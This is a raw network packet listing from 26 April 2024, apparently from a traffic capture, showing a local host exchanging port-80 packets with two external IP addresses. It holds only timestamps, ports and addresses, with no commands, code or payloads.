Apr 26, 2024 10:27:05.424026012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424061060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424062967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424098015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424118996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424154043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424161911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424191952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424195051 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424228907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424230099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424266100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424273014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424302101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424307108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424340010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424340963 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424376011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424384117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424413919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424415112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424451113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424453020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424488068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424489021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424525023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424526930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424561024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424565077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424598932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424599886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424637079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424638033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424673080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424675941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424710989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424715996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424747944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424751043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424784899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424787045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424820900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424825907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424858093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424865007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424907923 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424913883 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424945116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424949884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.424982071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.424987078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.425019026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.425026894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.425059080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.425061941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.425101042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.617582083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617647886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617687941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617742062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617753029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.617780924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617794991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.617825031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617872953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.617882013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617922068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617960930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.617973089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.617999077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618036985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618041992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618074894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618117094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618119955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618155956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618192911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618196964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618231058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618267059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618277073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618305922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618350029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618351936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618387938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618424892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618443012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618463993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618499994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618514061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618537903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618575096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618582010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618613005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618649960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618649960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618690014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618727922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618732929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618763924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618803024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618810892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618841887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618880033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618882895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.618921041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618959904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.618966103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.619446039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619792938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.619793892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619834900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619874001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619882107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.619914055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619951963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.619956017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.619988918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.620028019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.620035887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.620068073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.620111942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.620816946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.620857000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.620928049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.621110916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.621151924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.621190071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.621200085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.621228933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.621270895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.625332117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.625353098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.625400066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627413034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627429008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627440929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627473116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627501011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627515078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627545118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627568007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627582073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627594948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627604008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627630949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627832890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627876997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627890110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627912998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.627938032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627964020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627978086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.627980947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628011942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628015041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628026962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628065109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628091097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628118992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628132105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628144979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628153086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628180981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628269911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628340960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628355026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628376961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628416061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628454924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628463030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628546953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628559113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628582954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628592968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628604889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628618002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628628969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628635883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628648996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628658056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628662109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628684044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628698111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628747940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628774881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628789902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628803015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628815889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628824949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628854036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628856897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628868103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628906012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628928900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628942966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628968000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.628978014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.628998995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629035950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629045963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629057884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629081964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629092932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629096031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629122019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629132032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629136086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629162073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629172087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629245996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629280090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629317045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629329920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629343033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629362106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629364967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629399061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629424095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629466057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629479885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629503012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629573107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629586935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629611015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629637003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629650116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629662037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629676104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629686117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629712105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629733086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629749060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.629759073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629793882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.629837990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.631450891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631464005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631477118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631489038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631500959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631513119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.631561041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.631587029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631603003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631623030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.631654978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.631692886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.633768082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633781910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633820057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.633824110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633869886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633883953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633903027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.633929014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633955002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.633966923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634059906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634094000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634099007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634108067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634120941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634141922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634166956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634202957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634231091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634244919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634257078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634279013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634282112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634296894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634319067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634321928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634358883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634394884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634408951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634421110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634443045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634454012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634490013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634500027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634557962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634572029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634593010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634601116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634635925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634654999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634687901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634721041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634725094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634746075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634780884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634800911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634814978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634829044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634850025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634860992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634895086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.634926081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634946108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.634983063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.635001898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.635015011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.635051012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.635234118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.635287046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.635322094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.635325909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.636754036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.636768103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.636797905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.636815071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.636828899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.636850119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.636869907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.636904001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637085915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637268066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637281895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637294054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637301922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637324095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637334108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637376070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637389898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637403965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637414932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637443066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.637454033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637468100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637480974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.637501955 CEST	49734	80	192.168.2.4	176.97.76.106
